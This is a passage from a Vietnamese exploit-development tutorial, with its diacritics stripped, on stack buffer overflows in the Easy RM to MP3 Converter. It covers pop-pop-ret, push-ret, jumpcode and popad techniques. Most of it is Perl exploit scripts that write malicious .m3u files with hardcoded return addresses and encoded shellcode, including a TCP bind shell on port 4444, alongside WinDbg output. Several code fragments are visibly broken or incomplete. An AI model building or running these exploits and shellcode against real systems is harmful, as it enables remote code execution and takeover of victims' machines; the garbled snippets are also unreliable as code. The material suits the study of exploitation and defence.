\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45 .
\x31\x42\x4c\x42\x43\x45\x50\x41\x41;
open($FILE,>$file);
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
3.3.2. pop return
nu khng c mt thanh ghi no tr trc tip ti a ch, nhng bn c th thy mt a ch trong
stack ( c th nm u tin, th hai) tr ti shellcode, bn c th ti vo trong EIP, nu u tin
l pop ret[17], hoc pop pop ret nu th hai, hoc pop pop pop pop ret ph thuc vo v tr nm trong
stack.
Trong v d Easy RM to MP3, chng ta hon ton c th tinh chnh ESP tr trc tip ti shellcode.
Vy s nh th no nu khng c thanh ghi no tr ti shellcode.
Vng, trong trng hp ny, a ch tr ti shellcode c th nm trn stack. Nu bn dump esp, nhn
vo cc a ch u tin. Nu mt trong cc a ch ny tr ti shellcode ( hoc buffer bn iu khin
c), tip theo bn c th tm c pop ret hoc pop pop ret :
Ly a ch trong stack
Nhy n a ch m n a bn ti shellcode
K thut pop ret ch c tc dng khi ESP+offset cha a ch tr ti shellcode. V vy, khi dump ESP,
nu mt trong cc a ch u tin tr ti shellcode, v t mt tham chiu ti pop ret ( hoc pop pop
ret) trong EIP. iu ny lm mt mt s a ch trong stack ( mt a ch cho mt ln pop) v a a
ch tip theo vo EIP. Nu mt trong s tr ti shellcode, bn s thnh cng.
Trng hp th hai s dng pop ret: Khi bn kim sot c EIP, khng c thanh ghi no tr ti
shellcode, nhng shellcode ca bn c thy ESP+8. Trong trng hp ny, bn c th t pop pop
ret vo EIP, s nhy ti ESP+8.
Hy xy dng mt th nghim. Chng ta c 26094 bytes trc khi ghi EIP, v cn 4bytes trc khi
ti v tr ESP tr ti (trong trng hp ca ti, y l 0x000ff730).
Chng ta s m phng ti ESP+8, c mt a ch tr ti shellcode ( thc t l s t shellcode ngay
sau , y ch l th nghim). 26094 A, tip theo l XXXX ( kt thc l ni ESP tr ti), break, tip
n l 7 NOP, break, v nhiu NOP na. Gi s shellcode bt u t break th hai. Mc ch l nhy t
break u tin ti ti break th hai, ESP+8 0x000ff738.
my $eip = BBBB;
my $shellcode = \xcc;
$shellcode = $shellcode . \x90 x 7
$shellcode = $shellcode . \xcc;
$shellcode = $shellcode . \x90 x 500;
open($FILE,>$file);
close($FILE);
Nhn vo stack, ng dng b crash bi buffer overflow. EIP b ghi bi BBBB. ESP tr ti 000ff730,
bt u vi break u tin, tip n l 7 NOP, chng ta s thy break th hai, ni thc s bt u ca
shellcode ( ti a ch 0x000ff738).
Mc ch l ly gi tr trong ESP+8 vo EIP, v lm cho nhy n shellcode. Chng ta s s dng k
thut pop ret v a ch ca jmp esp hon thnh.
Mt lnh pop s ly 4bytes trong stack, khi ESP tr ti 000ff734. Chy mt lnh pop na, s ly
tip 4bytes na, ESP tr ti 000ff738. Khi lnh ret c thc thi, gi tr hin ti ca ESP s c a
vo EIP. Cho nn gi tr ti 000ff738 cha a ch ca lnh jmp esp, th l nhng g EIP s lm.
Buffer sau 000ff738 cha shellcode ca chng ta.
Chng ta cn tm pop,pop,ret trong mt ni no , v ghi EIP bng a ch lnh u tin trong
chui lnh . V chng ta phi thip lp ESP+8 tr n a ch ca jmp esp, theo sau l shellcode ca
chng ta.
Trc tin chng ta phi bit opcode ca pop pop ret. Chng ta s s dng chc nng assembly trong
windbg thc hin:
0:000> a
7c90120e pop eax
pop eax
7c90120f pop ebp
pop ebp
7c901210 ret
ret
7c901211
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e 58
pop
eax
7c90120f 5d
pop
ebp
7c901210 c3
ret
7c901211 ffcc
dec
7c901213 c3
ret
7c901214 8bff
mov
7c901216 8b442404
esp
mov
edi,edi
eax,dword ptr [esp+4]
7c90121a cc
int
Cho nn pop pop ret c opcode l 058,0x5d,0xc3

ng nhin, chng ta c th s dng cc opcode khc, v nh cc opcode sau y:
Hnh 3.21: Mt vi opcode

By gi chng ta phi tm chui opcode ny trong cc dll c sn. Trong phn mt chng ti ni dll
ng dng so vi dll ca h iu hnh. Theo , ti khuyn co s dng dll ca ng dng bi n lm
tng tnh tin cy, trnh ph thuc vo phin bn windows. Nhng bn cn chc chn rng dll s dng
a ch mi lc. i khi, dll c rebase v trng hp tt hn s dng dll ca OS nh user32.dll
hoc kernel32.dll.
M Easy RM to MP3 ( v khng m g c) ri nh km windbg vo tin trnh chy. Windbg s hin th
cc module c load, gm c OS modules v module ng dng ( tm dng bt u vi ModLoad).
y l mt vi dll ca ng dng:
ModLoad: 00ce0000 00d7f000
C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dll
ModLoad: 01a90000 01b01000
C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll
ModLoad: 00c80000 00c87000
ModLoad: 01b10000 01fdd000
Bn nn hn ch s dng cc a ch cha null bytes bi n lm vic exploit tr nn kh khn hn. Tm

kim trong MSRMCcodec00.dll cho ta mt s kt qu:
0:014> s 01a90000 l 01b01000 58 5d c3
01ab6a10 58 5d c3 33 c0 5d c3 55-8b ec 51 51 dd 45 08 dc X].3.].U..QQ.E..
01ab8da3 58 5d c3 8d 4d 08 83 65-08 00 51 6a 00 ff 35 6c X]..M..e..Qj..5l
01ab9d69 58 5d c3 6a 02 eb f9 6a-04 eb f5 b8 00 02 00 00 X].jj..
Gi chng ta c th nhy ti ESP+8. v tr , ta cn t mt a ch ti jmp esp ( nh ni, sau
khi RET, s ly a ch t vo EIP. Ti thi im , ESP ang tr ti shellcode ca chng ta nm
ngay sau a ch jmp esp).
Trong phn mt chng ta thy 0x01ccf23a tr ti jmp esp. Quay tr li perl script ca chng ta, s
thay th BBBB ghi EIP bng a ch pop,pop,ret, theo sau l 8bytes NOP ( m phng ESP+8), tip
n l a ch jmp esp v tip n l shellcode.
Buffer s nh sau:
[AAAAAAAAAAAAA][0x01ab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x01ccf23a]
[Shellcode]
26094 As
EIP
8 bytes offset
JMP ESP
(=POPPOPRET)
Tin trnh exploit nh sau:
EIP b ghi bi POP POP RET, ESP tr ti byte u tin trong 8 bytes offset.
POP POP RET c thc thi. EIP ly a ch 0x01ccf23a ti ESP+8, ESP tr ti shellcode.
EIP b ghi a ch ti jmp esp, ln nhy th hai c thc hin v shellcode c chy.
Hnh 3.22: EIP b ghi a ch ti jmp esp

Chng ta s m phng vi mt break v mt s NOP nh l shellcode. Do , chng c th nhy nu
lm vic tt.
my $eip = pack(V,0x01ab6a10);
my $jmpesp = pack(V,0x01ccf23a);
$shellcode = $shellcode . $jmpesp;
$shellcode = $shellcode . \xcc . \x90 x 500;
open($FILE,>$file);
close($FILE);
N lm vic, by gi thay th NOP sau jmp esp (ESP+8) vi shellcode thc s.
3.3.3. Push return
phng php ny hi khc so vi phng php call to register, nu bn khng th tm thy opcode
call register hoc jump register, bn c th push a ch vo stack v tin hnh ret. Do , bn cn
tm push register theo sau l ret. Nu nh tm c chui ny, mt a ch thc thi chui ny, v ghi
EIP vi a ch tm c.
push ret tng t nh cal [reg]. Nu c mt thanh ghi tr trc tip ti shellcode ca bn, v mt l do
no khng th s dng jmp [reg] nhy ti shellcode, bn c th:
t a ch ca thanh ghi vo trong stack, n s nm nh stack

ret ( ly a ch ny trong stack v nhy ti )
lm c vic ny, bn cn ghi EIP bng a ch ca chui push [reg] ret trong mt th vin dll.
Gi s ESP tr trc tip vo shellcode, bn cn tm opcode push esp, theo sau l opcode ret.
0:000> a
000ff7ae push esp
push esp
000ff7af ret
ret
0:000> u 000ff7ae
<Unloaded_P32.dll>+0xff79d:
000ff7ae 54
000ff7af c3
push
esp
ret
Opcode c trnh t 054,0xc3. Tin hnh tm chui opcode ny:
Hnh 3.23:Opcode c trnh t 054,0xc3

To mt exploit v chy:
my $eip = pack(V,0x01aa57f6);
my $shellcode = \x90 x 25

$shellcode = $shellcode . \x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49 .

\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .
\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42 .
\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a .
\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43 .
\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a .
\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c .
\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47 .
\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50 .
\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42 .
\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b .
\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45 .
\x31\x42\x4c\x42\x43\x45\x50\x41\x41;
open($FILE,>$file);
close($FILE);
3.3.4. jmp [reg + offset]

nu mt thanh ghi tr n stack cha shellcode, nhng khng tr trc tip ti im bt u ca
shellcode, bn cng nn c gng tm trong cc lnh ca OS hoc dll m thm cc bytes cn thit vo
thanh ghi ri tin hnh jump. Ti gi l phng php jmp [reg + offset].
Mt k thut khc khc phc tnh trng shellcode bt u v tr offset ca thanh ghi ( ESP trong v
d) l th tm lnh jmp [reg + offset] v ghi EIP bng a ch ca lnh ny. Gi s chng ta cn
nhy 8bytes ( nh trong v d trc), s dng k thut jmp reg+offset nhy 8bytes ti trc tip shell
code.
Chng ta cn 3 th:
Tm c opcode ca esp+8h.
Tm c a ch tr ti lnh ny.
Ghi EIP bng a ch .
S dng windbg tm opcode:

0:014> a
7c90120e jmp [esp + 8]
jmp [esp + 8]
7c901212
0:014> u 7c90120e
7c90120e ff642408
jmp
dword ptr [esp+8]
Opcode l ff642408
By gi bn cn tm kim nhng dll c opcode ny, v s dng a ch ghi EIP. Nhng ti khng
th tm c opcode ny bt k u. ng nhin, khng gii hn vic tm kim phi l esp+8, c
th l ln hn 8, khi ta s thm mt s NOP cho ph hp.
3.3.5. blind return
Trong nhng phn vit trc, ESP tr n v tr nh stack hin hnh. Mt lnh RET khi thc thi s thc
hin lnh pop gi tr cui cng ( 4bytes) t stack v t a ch vo EIP. Vy nu bn ghi EIP
bng mt a ch thc hnh lnh RET, bn s mang c a ch trong ESP vo EIP. Nu bn phi i
mt vi trng hp khng gian b nh c sn trong buffer b gii hn sau khi EIP b ghi ln, nhng
li c rt nhiu khng gian trc khi ghi ESP, bn c th s dng lnh jump phn buffer nh
nhy v u buffer, ni cha main shellcode.
K thut ny gm 2 bc sau:
Ghi EIP vi a ch tr ti lnh RET.
Bit c a ch 4bytes u ca ESP.
Khi lnh RET c thc thi, s ly 4bytes ny ( lc ny ang nh stack) ghi vo EIP.
Exploit nhy ti shellcode.
K thut ny c tc dng khi:
Bn khng th tr EIP ti mt thanh ghi ( v khng tm c lnh jump hay call no).
Bn iu kin c ESP.
thc hin c, bn cn phi c a ch b nh ca shellcode ( bng a ch stack). Nh thng l,

trnh null bytes bn thng t shellcode sau EIP. Nu shellcode t v tr khng c null bytes, n
c th lm vic.
Tm a ch ca lnh RET trong cc dll.
Thit lp 4bytes u ca ESP tr ti ni shellcode bt u, v ghi EIP vi a ch tr ti lnh
RET. Nh rng trong phn 1, ESP tr ti 0x000ff730, ng nhin a ch ny thay i theo tng h
iu hnh, nhng khng c cch no khc ngoi t cng a ch. Buffer s trng nh sau:
[26094 As][address of ret][0x000fff730][shellcode]
3.3.6. Dealing with small buffers
(jumping anywhere with custom jumpcode)
Chng ta ni v cch lm cho EIP nhy ti shellcode ca chng ta. R rng l chng ta thoi
mi t shellcode trong buffer ( phn sau EIP). Nhng nu chng ta khng c ln t
shellcode vo th sao?
Trong v d, chng ta s dng 26094 A ghi ln EIP, v chng ti thy rng ESP tr ti
26094+4bytes, c rt nhiu khng gian pha trc. Nhng nu chng ta ch c 50bytes pha sau.
50bytes lu tr shellcode l khng . V vy, chng ta phi tm xung quanh, v s dng 26094 khi
kch hot trn b nh m.
u tin, chng ta cn tm 26094 bytes ny u trong b nh. Nu khng tm thy n u, rt
kh tham chiu ti. Thc t nu tm thy trong b nh, v mt thanh ghi no tr n th iu
tr nn qu d dng.
Th kim tra Easy RM to MP3, bn c th thy rng 26094 bytes c th thy trong ESP dump:
my $eip = BBBB;
my $preshellcode = X x 54
my $nop = \x90 x 230;
open($FILE,>$file);
print $FILE $junk.$eip.$preshellcode.$nop;
close($FILE);
M file test1.m3u chng ta thy 50 X trong ESP. Gi s l khng gian dnh cho shellcode. Tuy
nhin, nhn xung di, chng ta thy rng A bt u ti a ch 000ff849 (=ESP+281).
Khi nhn vo cc thanh ghi khc, chng ta khng thy du vt no ca X v A. V vy, y chnh l n.
Chng ta c th ngy ti ESP thc thi shellcode, nhng chng ta ch c 50bytes. Chng ta s s
dng phn b nh khc trong buffer ca chng ta v tr thp hn, thc t chng ta s nhy ti phn
ni dung ca ESP, s c phn b nh ln vi A.
Hnh 3.24: phn b nh ln vi A

A c lu tr v c cch t X nhy ti A, lm c nh vy ta cn mt s iu sau:
V tr 26094 A phi nm trong ESP. 000ff849 (Ni no A c th hin trong ESP thc s bt u?)
(V vy nu chng ta mun shellcode ca chng ti bn trong cc l A, chng ta cn bit chnh
xc ni n cn phi c t)
Jumpcode : m chng ta dng nhy t X ti A. M ny khng th ln hn 50 byte (bi v l tt
c c sn trc tip ti ESP)
Chng ta c th tm v tr chnh xc bng on, custom patterns, metasploit patterns. y chng ta
s dng metasploits patterns, to ra 1000 characters v thay th trong perlscript, nn s cn 25101
As
my $pattern = Aa0Aa1Aa2Aa3Aa4Aa.g8Bg9Bh0Bh1Bh2B;
my $eip = BBBB;
my $preshellcode = X x 54;
my $nop = \x90 x 230;
open($FILE,>$file);
print $FILE $pattern.$junk.$eip.$preshellcode.$nop;

close($FILE);
Chng ta thy 000ff849 l mt phn mu, 4 k t u l 5Ai6.
Hnh 3.25: 000ff849 l mt phn mu

S dng metasploit pattern_offset utility, chng ta thy 4 k t ny offset 257. Nh vy thay v a
26094 A, ti s a 257 A, tip theo l shellcode ca chng ta, v phn cn li l A na. Thm ch tt
hn s l bt u vi 250 A, ri 50 NOP, shellcode ca chng ta, ri A. Nu t NOP trc shellcode,
n s lm vic tt.
Perl script ca chng ta s nh sau:
my $buffersize = 26094;
my $junk= A x 250;
my $nop = \x90 x 50;
my $restofbuffer = A x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = BBBB;
my $nop2 = \x90 x 230;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print Size of buffer : .length($buffer).\n;
open($FILE,>$file);
print $FILE $buffer.$eip.$preshellcode.$nop2;
close($FILE);
Khi ng dng cht, chng ta c th thy 50 NOPs ca chng ta bt u t 000ff848, tip theo l
shellcode (0x90 ti 000ff874), v sau mt ln na tip theo ca A
iu th hai chng ta cn lm l xy dng jump code. Mc tiu ca jump code l nhy ESP+281.
Nhy ESP+281 yu cu: Add 281 vo thanh ghi ESP, sau jump esp. 281 = 119h. ng c gng cho
tt c vo mt lnh, hoc opcode s c null bytes.
V c NOP pha trc, nn khng cn thit phi chnh xc hon ho. Min l chng ta thm 281 ( hoc
hn), n c th lm vic. C 50bytes cho jump code, khng phi l vn .
Tin hnh thm 0x5e (94) 3 ln, sau jump to esp, m assemly s l:
0:014> a
7c901211 add esp,0x5e
add esp,0x5e
add esp,0x5e
add esp,0x5e
7c90121a jmp esp
jmp esp
7c90121c
0:014> u 7c901211
ntdll!DbgBreakPoint+0x3:
7c901211 83c45e
add
esp,5Eh
7c901214 83c45e
add
esp,5Eh
7c901217 83c45e
add
esp,5Eh
7c90121a ffe4
jmp
esp
Opcode cho jump code s l:

0x83,0xc4,0x5e,0x83,0xc4,0x5e,0x83,0xc4,0x5e,0xff,0xe4
my $junk= A x 250;
my $nop = \x90 x 50;
my $eip = BBBB;
my $jumpcode = \x83\xc4\x5e .
#add esp,0x5e
\x83\xc4\x5e .
#add esp,0x5e
\x83\xc4\x5e .
#add esp,0x5e
\xff\xe4;
#jmp esp
my $nop2 = 0x90 x 10;

open($FILE,>$file);
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
jumpcode t ESP. Khi c gi, ESP tr n NOPs ( gia 00ff842 v 000ff873). Shellcode bt
u 000ff874.
Cui cng l ghi EIP vi jmp esp, quay li phn 1 ta s c th lm c a ch 0x01ccf23a. Tm
li, iu g xy ra khi overflow:
Shellcode thc s c t phn u chui, v kt thc ti ESP+300. Shellcode thc s c cch
mt s NOP cho php nhy mt s bit.
EIP b ghi vi a ch 0x01ccf23a, tr ti jmp esp
Data sau EIP b ghi vi jumpcode thm 282 vo ESP v nhy n .
Khi payload c gi, EIP s jump to esp, ri nhy ti ESP+282, Nop b qua, shellcode c thc
hin.
EIP = 0x000ff874 = begin of shellcode
Thay th bng shellcode thc s, thay A bng NOP:
my $junk= \x90 x 200;
my $nop = \x90 x 50;

my $shellcode = \x89\xe2\xd9\xeb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49 .
\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .
\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42 .
\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d .
\x51\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45 .
\x57\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c .
\x34\x47\x4b\x50\x54\x51\x34\x45\x54\x44\x35\x4d\x35\x4c .
\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4b\x39\x51\x4c\x46 .
\x44\x45\x54\x48\x43\x51\x4f\x46\x51\x4c\x36\x43\x50\x50 .
\x48\x4d\x59\x4c\x38\x4d\x53\x49\x50\x42\x4a\x46\x30\x45 .
\x38\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b .
\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43 .
\x51\x42\x4c\x45\x33\x45\x50\x41\x41;
my $restofbuffer = \x90 x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $jumpcode = \x83\xc4\x5e .
\x83\xc4\x5e .
\xff\xe4;
#add esp,0x5e
#add esp,0x5e
#jmp esp
my $nop2 = 0x90 x 10;

open($FILE,>$file);
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
3.3.7. SEH (Structured Exception Handling)
Mi ng dng c nhng x l ngoi l mc nh c cung cp bi OS. V vy ngay c khi ng dng
khng s dng x l ngoi l, bn vn c th th ghi ln phn x l SEH bng a ch ca bn v
lm n nhy ti shellcode ca bn. S dng SEH lm cho exploit tr nn tin cy trn nhiu nn tng
Windows, nhng i hi nhiu k nng hn trc khi bt u li dng SEH xy dng exploit.
tng y l gi s bn xy dng mt exploit khng hot ng c trn OS cho, phn payload
s gy crash ng dng, kch hot mt ngoi l ( trigger). V vy bn c th kt hp mt exploit thng
thng vi mt SEH exploit thnh mt exploit tin cy. Phn ba ca loi tutorial s ni v SEH exploit.
Ch cn nh rng, c im in hnh ca stack based overflow l ghi ln mt EIP, c kh nng gi
ti mt SEH exploit c bn cho php tin cy hn, mt buffer c kch thc ln hn
y l mt k thut kh, i hi nhiu thi gian v cng sc c th nghin cu chi tit k thut
ny.
3.3.8. Mt s k thut khc
Popad: lnh ny gip chng ta nhy ti shellcode kh tt. popad (pop all double) s ly double words
t trong stack (ESP) vo cc thanh a nng ch trong mt ln. Th t cc thanh ghi c np l: EDI,
ESI, EBP, EBX, EDX, ECX v EAX. Kt qu l ESP s tng ln sau mi ln load vo, mt popad s ly
32bytes t ESP v t vo cc thanh ghi theo th t.
Popad c opcode l 0x61.
Gi s bn cn nhy 40bytes, m ch c vi bytes thc hin lnh nhy, c th dng 2popad tr ESP
ti shellcode ( vi mt vi bytes NOP b vo 232 40)
By gi chng ta s s dng Easy RM to MP3 demo k thut ny. Vn s dng script c, chng ta
s xy dng buffer gi ti 13 X, tip theo l mt s bytes rc ( D v A), ri n shellcode ca chng ta
( NOP+A).
my $junk= A x 250;
my $nop = \x90 x 50;
my $eip = BBBB;
my $garbage = \x44 x 100
open($FILE,>$file);
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
M file bng Easy RM to MP3, ng dng s b sp
Gi s chng ta c 13X s dng ( s t popad y) nhy qua 100 D v 160 A, tng cng l
260bytes s n shellcode ca chng ta ( bt u bng NOP ri n 1 break cc ri n A). Mt popad
= 32bytes, 260bytes = 9popad ( -28bytes), v vy cn phi bt u shellcode vi NOPs, hoc bt u
shellcode cch 28bytes. Trng hp ca chng ta s t NOP trc.
Trc tin ghi EIP vi jmp esp ( xem li cc phn trc). Sau , thay X bng 9 popad, tip n
l opcode jmp esp (0xff,0xe4).
my $junk= A x 250;
my $nop = \x90 x 50;
$preshellcode=$preshellcode.\x61 x 9;
$preshellcode=$preshellcode.\xff\xe4;
$preshellcode=$preshellcode.\x90\x90\x90;
my $garbage = \x44 x 100;
open($FILE,>$file);
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
Sau khi ng dng sp , dng ti im break, ESP v EIP nh sau: eip=000ff874 esp=000ff850
Popad lm vic v t ESP ti NOP ca shellcode, sau thc hin jmp esp (0xff 0xe4) lm EIP
tr ti NOP. Thay th A bng shellcode thc s:
Mt cch khc ( t c a thch nhng vn c kh nng) l nhy n shellcode bng jumpcode s
dng a ch ( hoc offset ca thanh ghi). T khi m a ch thanh ghi khc nhau trong cc chng
trnh thc thi cch ny khng cn c hiu qu.
V vy, tin hnh hardcode a ch hoc offset ca thanh ghi, bn cn tm opcode nhy, sau ,
s dng opcode ny trong on buffer nh nhy ti shellcode thc ca bn.
Di y l 2 v d gip bn tm c opcode:
1. jump to 0x12345678
0:000> a
7c90120e jmp 12345678
jmp 12345678
7c901213
0:000> u 7c90120e
7c90120e e96544a495
jmp
12345678
=> opcode is 0xe9,0x65,0x44,0xa4,0x95

2. jump to ebx+124h
0:000> a
7c901214 add ebx,124
add ebx,124
7c90121a jmp ebx
jmp ebx
7c90121c
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
7c901214 81c324010000
7c90121a ffe3
jmp
add
ebx,124h
ebx
Opcode l 0x81,0xc3,0x24,0x01,0x00,0x00 (add ebx 124h) v 0xff,0xe3 (jmp ebx).

Nhy ngn v nhy c iu kin.
Trong trng hp bn ch cn nhy qua mt vi bytes, bn c th dng k thut short jump thc
hin:
short jump : (jmp) : opcode 0xeb, theo sau l s bytes cn nhy. V d, mun nhy 30 bytes, the
opcode l 0xeb,0x1e.
Trong trng hp bn mun nhy c iu kin ( khi iu kin c p ng), bn s dng conditional
(short/near) jump. K thut ny s dng trng thi ca cc thanh ghi c EFLAGS (CF,OF,PF,SF v ZF).
Nu nhng c ny trng thi c bit ( do iu kin), c th lm cho nhy n mc tiu theo ton
hng ch.
V d: gi s bn mun nhy 6bytes, nhn vo c ( ollydbg) v trng thi c, bn c th dng cc

opcode sau:
Nu c Zero l 1, bn c th dng opcode 0x74, tip theo l s bytes cn nhy, l 0x06 trong v d
ny.
Bng opcode ca cc lnh nhy v c[18]
Da vo bng, bn cng c th nhy nu ECX bng 0. Trong trng hp SEH, cc thanh ghi s b xa
khi ngoi l xy ra, bn c th s dng opcode 0xe3 nhy (ECX = 00000000).
Backward jumps: Trong trng hp bn mun nhy ngc li ( nhy vi offset lm s m): ly s
nghch o v chuyn v dng hex. Gi tr dword hex c s dng nh l argument cho jump (\xeb
hoc \xe9).
V d : jump back 7 bytes : -7 = FFFFFFF9, cho nn jump -7 s l: \xeb\xf9\xff\xff
V d na: jump back 400 bytes : -400 = FFFFFE70, cho nn jump -400 bytes =
\xe9\x70\xfe\xff\xff
( bn c th thy opcode di 4bytes, trong khi mt dword size (4 byte limit),
v th bn cn thc hin nhiu bc nhy chia nh bc nhy ra).

3.4.
SHELLCODE BACKDOOR
Bn c th to ra shellcode khc v thay th calc shellcode vi shellcode mi ca bn. Nhng n c

th khng hot ng c v shellcode c th c ln hn, v tr b nh c th khc nhau, v
shellcode di lm tng nguy c c nhng invalid characters k t khng hp l, cho nn cn chn
lc.
Gi s mun mt shellcode: lng nghe trn mt port c th connect ti.
Shellcode trng nh sau:
# windows/exec - 144 bytes

# Encoder: x86/shikata_ga_nai
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
Nh bn thy, shellcode ny di 344byte, trong khi calc l 144byte, bn s thy ng dng b crash:
Hnh 3.26: shellcode di 344byte ng dng b crash

iu ny rt c th ch ra mt vn vi kch thc shellcode (nhng bn c th kim tra kch thc
buffer, bn s nhn thy rng y khng phi l vn ). Hoc c nhng invalid characters trong
shellcode. Bn c th loi tr cc k t ny vi Metasploit, nhng bn cn bit k t no c k t
no khng. Mc nh, null bytes b hn ch, nhng cn nhng k t no khc?
Cc tp tin m3u cha filename, nn mt cch lc l loi cc k t cha trong filename v filepath. Bn
cng c th hn ch bng cch s dng mt decoder khc. Chng ti s dng shikata_ga_nai,
nhng c l alpha_upper lm vic tt hn vi filename. S dng encoded khc c th lm tng di
shellcode, nhng nh thy, kch thc khng phi vn qu ln.
Chng ta s th tcp shell bind,s dng alpha_upper encoder, lng nghe trn cng 4444. Shellcode ny
c di 703bytes
my $file= exploitrmtomp3.m3u;
# windows/shell_bind_tcp 703 bytes

# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode=$shellcode.\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49 .
\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .
\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42 .
\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42 .
\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b .
\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47 .
\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a .
\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43 .
\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a .
\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44 .
\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a .
\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a .
\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c .
\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a .
\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45 .
\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50 .
\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45 .
\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c .
\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43 .
\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43 .
\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42 .
\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48 .
\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43 .
\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42 .
\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48 .
\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51 .
\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42 .
\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42 .
\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48 .
